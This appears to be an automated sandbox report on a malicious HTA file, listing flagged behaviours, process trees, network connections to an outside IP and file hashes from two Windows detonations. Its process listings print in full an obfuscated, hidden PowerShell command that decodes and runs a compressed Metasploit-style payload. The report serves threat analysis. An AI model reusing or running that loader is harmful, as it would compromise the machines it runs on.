Analysis Overview
SHA256
b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1
Threat Level: Known bad
The file b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-31 08:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 08:27
Reported
2024-05-31 08:30
Platform
win7-20240508-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX
{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| CN | 1.14.247.162:40001 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 5c54bbe30a6193ff03203ca17e6fccca |
| SHA1 | 42312ffae8b50ef3c3f3c681ac9b9e54ccb58788 |
| SHA256 | 8baf0555d9c561f95b3b2523727a8fe10daac5cd3c3218d32b0ba8067e043bd1 |
| SHA512 | 966251b0c7434c9950a6d2d7115d359afa9283f433cc96e383d9d7aaf27082a88682dc6373debcbb2c15c2f64f0da839dd3723d1aa5d6a166febf14621f10f6a |
memory/1276-7-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-31 08:27
Reported
2024-05-31 08:30
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX
{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| CN | 1.14.247.162:40001 | | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
memory/4340-0-0x00000000709DE000-0x00000000709DF000-memory.dmp
memory/4340-1-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
memory/4340-2-0x00000000057C0000-0x0000000005DE8000-memory.dmp
memory/4340-3-0x00000000709D0000-0x0000000071180000-memory.dmp
memory/4340-4-0x00000000709D0000-0x0000000071180000-memory.dmp
memory/4340-5-0x0000000005720000-0x0000000005742000-memory.dmp
memory/4340-6-0x0000000005F20000-0x0000000005F86000-memory.dmp
memory/4340-7-0x0000000005F90000-0x0000000005FF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i30gtbox.rza.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4340-17-0x0000000006000000-0x0000000006354000-memory.dmp
memory/4340-18-0x00000000065D0000-0x00000000065EE000-memory.dmp
memory/4340-19-0x0000000006620000-0x000000000666C000-memory.dmp
memory/4340-20-0x0000000007F20000-0x000000000859A000-memory.dmp
memory/4340-21-0x0000000006B10000-0x0000000006B2A000-memory.dmp
memory/4340-25-0x00000000709D0000-0x0000000071180000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/4364-35-0x00000000061A0000-0x00000000064F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0aeff08b35900f0766b875f429a0b880 |
| SHA1 | a181cd6e18cf1d2ee1ab40e99760f5b2dde58086 |
| SHA256 | 1b7ba808ba76c8882de1ebd1255811e3e7c7bd5a83c029b4487e9f9f7c5be507 |
| SHA512 | 6132d010fdd08d40e61aaf552fb6b81aa3a2efc4c9058ce632bbc799e473e0619dc5299e51144d9994ee87b207a34a0522ffa7c7125353c94996f3b6452d0c65 |
memory/4364-37-0x0000000006180000-0x0000000006181000-memory.dmp